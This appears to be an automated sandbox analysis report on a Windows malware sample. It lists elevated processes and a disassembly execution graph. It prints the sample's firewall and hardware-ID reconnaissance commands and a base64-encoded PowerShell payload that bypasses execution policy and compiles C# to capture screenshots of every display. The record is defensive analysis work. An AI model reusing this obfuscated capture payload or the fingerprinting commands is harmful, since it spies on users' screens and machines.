                                                                                                                                                                                                                                                          Target ID:63
                                                                                                                                                                                                                                                          Start time:20:53:10
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:netsh firewall show config
                                                                                                                                                                                                                                                          Imagebase:0x7ff633c30000
                                                                                                                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:64
                                                                                                                                                                                                                                                          Start time:20:53:11
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:65
                                                                                                                                                                                                                                                          Start time:20:53:11
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:66
                                                                                                                                                                                                                                                          Start time:20:53:11
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                          Imagebase:0x7ff70bb60000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:67
                                                                                                                                                                                                                                                          Start time:20:53:12
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:68
                                                                                                                                                                                                                                                          Start time:20:53:12
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:69
                                                                                                                                                                                                                                                          Start time:20:53:12
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:70
                                                                                                                                                                                                                                                          Start time:20:53:13
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6c61c0000
                                                                                                                                                                                                                                                          File size:2'759'232 bytes
                                                                                                                                                                                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:71
                                                                                                                                                                                                                                                          Start time:20:53:13
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71B8.tmp" "c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6630c0000
                                                                                                                                                                                                                                                          File size:52'744 bytes
                                                                                                                                                                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:73
                                                                                                                                                                                                                                                          Start time:20:53:17
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:74
                                                                                                                                                                                                                                                          Start time:20:53:17
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:75
                                                                                                                                                                                                                                                          Start time:20:53:17
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                          Imagebase:0x7ff70bb60000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:10.4%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                            Signature Coverage:19.6%
                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                            Total number of Limit Nodes:62
                                                                                                                                                                                                                                                            execution_graph 15755 7ff6404eae00 15756 7ff6404eae2e 15755->15756 15757 7ff6404eae15 15755->15757 15757->15756 15760 7ff6404fc90c 15757->15760 15761 7ff6404fc957 15760->15761 15766 7ff6404fc91b _set_fmode 15760->15766 15770 7ff6404f43f4 15761->15770 15762 7ff6404fc93e HeapAlloc 15764 7ff6404eae8e 15762->15764 15762->15766 15766->15761 15766->15762 15767 7ff6405028a0 15766->15767 15773 7ff6405028e0 15767->15773 15779 7ff6404fa5d8 GetLastError 15770->15779 15772 7ff6404f43fd 15772->15764 15778 7ff6404ff5e8 EnterCriticalSection 15773->15778 15780 7ff6404fa619 FlsSetValue 15779->15780 15784 7ff6404fa5fc 15779->15784 15781 7ff6404fa62b 15780->15781 15794 7ff6404fa609 SetLastError 15780->15794 15796 7ff6404fdea8 15781->15796 15784->15780 15784->15794 15786 7ff6404fa658 FlsSetValue 15789 7ff6404fa664 FlsSetValue 15786->15789 15790 7ff6404fa676 15786->15790 15787 7ff6404fa648 FlsSetValue 15788 7ff6404fa651 15787->15788 15803 7ff6404f9c58 15788->15803 15789->15788 15809 7ff6404fa204 15790->15809 15794->15772 15801 7ff6404fdeb9 _set_fmode 15796->15801 15797 7ff6404fdeee HeapAlloc 15799 7ff6404fa63a 15797->15799 15797->15801 15798 7ff6404fdf0a 15800 7ff6404f43f4 _set_fmode 10 API calls 15798->15800 15799->15786 15799->15787 15800->15799 15801->15797 15801->15798 15802 7ff6405028a0 _set_fmode 2 API calls 15801->15802 15802->15801 15804 7ff6404f9c8c 15803->15804 15805 7ff6404f9c5d RtlFreeHeap 15803->15805 15804->15794 15805->15804 15806 7ff6404f9c78 GetLastError 15805->15806 15807 7ff6404f9c85 __free_lconv_num 15806->15807 15808 7ff6404f43f4 _set_fmode 9 API calls 15807->15808 15808->15804 15814 7ff6404fa0dc 15809->15814 15826 7ff6404ff5e8 EnterCriticalSection 15814->15826 18521 7ff6404f8c79 18522 7ff6404f96e8 45 API calls 18521->18522 18523 7ff6404f8c7e 18522->18523 18524 7ff6404f8ca5 GetModuleHandleW 18523->18524 18525 7ff6404f8cef 18523->18525 18524->18525 18531 7ff6404f8cb2 18524->18531 18533 7ff6404f8b7c 18525->18533 18531->18525 18547 7ff6404f8da0 GetModuleHandleExW 18531->18547 18553 7ff6404ff5e8 EnterCriticalSection 18533->18553 18548 7ff6404f8dd4 GetProcAddress 18547->18548 18549 7ff6404f8dfd 18547->18549 18552 7ff6404f8de6 18548->18552 18550 7ff6404f8e02 FreeLibrary 18549->18550 18551 7ff6404f8e09 18549->18551 18550->18551 18551->18525 18552->18549 19416 7ff64050a079 19419 7ff6404f4788 LeaveCriticalSection 19416->19419 20039 7ff6404fb830 20050 7ff6404ff5e8 EnterCriticalSection 20039->20050 20074 7ff6404f4720 20075 7ff6404f472b 20074->20075 20083 7ff6404fe5b4 20075->20083 20096 7ff6404ff5e8 EnterCriticalSection 20083->20096 20101 7ff64050a10e 20102 7ff64050a11d 20101->20102 20104 7ff64050a127 20101->20104 20105 7ff6404ff648 LeaveCriticalSection 20102->20105 18466 7ff6404fec9c 18467 7ff6404fee8e 18466->18467 18469 7ff6404fecde _isindst 18466->18469 18468 7ff6404f43f4 _set_fmode 11 API calls 18467->18468 18486 7ff6404fee7e 18468->18486 18469->18467 18472 7ff6404fed5e _isindst 18469->18472 18470 7ff6404eb870 _log10_special 8 API calls 18471 7ff6404feea9 18470->18471 18487 7ff6405054a4 18472->18487 18477 7ff6404feeba 18478 7ff6404f9c10 _isindst 17 API calls 18477->18478 18480 7ff6404feece 18478->18480 18484 7ff6404fedbb 18484->18486 18512 7ff6405054e8 18484->18512 18486->18470 18488 7ff6405054b3 18487->18488 18489 7ff6404fed7c 18487->18489 18519 7ff6404ff5e8 EnterCriticalSection 18488->18519 18494 7ff6405048a8 18489->18494 18495 7ff6405048b1 18494->18495 18496 7ff6404fed91 18494->18496 18497 7ff6404f43f4 _set_fmode 11 API calls 18495->18497 18496->18477 18500 7ff6405048d8 18496->18500 18498 7ff6405048b6 18497->18498 18499 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18498->18499 18499->18496 18501 7ff6405048e1 18500->18501 18502 7ff6404feda2 18500->18502 18503 7ff6404f43f4 _set_fmode 11 API calls 18501->18503 18502->18477 18506 7ff640504908 18502->18506 18504 7ff6405048e6 18503->18504 18505 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18504->18505 18505->18502 18507 7ff640504911 18506->18507 18508 7ff6404fedb3 18506->18508 18509 7ff6404f43f4 _set_fmode 11 API calls 18507->18509 18508->18477 18508->18484 18510 7ff640504916 18509->18510 18511 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18510->18511 18511->18508 18520 7ff6404ff5e8 EnterCriticalSection 18512->18520 20164 7ff6405009c0 20175 7ff6405066f4 20164->20175 20176 7ff640506701 20175->20176 20177 7ff6404f9c58 __free_lconv_num 11 API calls 20176->20177 20178 7ff64050671d 20176->20178 20177->20176 20179 7ff6404f9c58 __free_lconv_num 11 API calls 20178->20179 20180 7ff6405009c9 20178->20180 20179->20178 20181 7ff6404ff5e8 EnterCriticalSection 20180->20181 18574 7ff6404f4938 18575 7ff6404f4952 18574->18575 18576 7ff6404f496f 18574->18576 18577 7ff6404f43d4 _fread_nolock 11 API calls 18575->18577 18576->18575 18578 7ff6404f4982 CreateFileW 18576->18578 18579 7ff6404f4957 18577->18579 18580 7ff6404f49ec 18578->18580 18581 7ff6404f49b6 18578->18581 18583 7ff6404f43f4 _set_fmode 11 API calls 18579->18583 18625 7ff6404f4f14 18580->18625 18599 7ff6404f4a8c GetFileType 18581->18599 18586 7ff6404f495f 18583->18586 18592 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18586->18592 18588 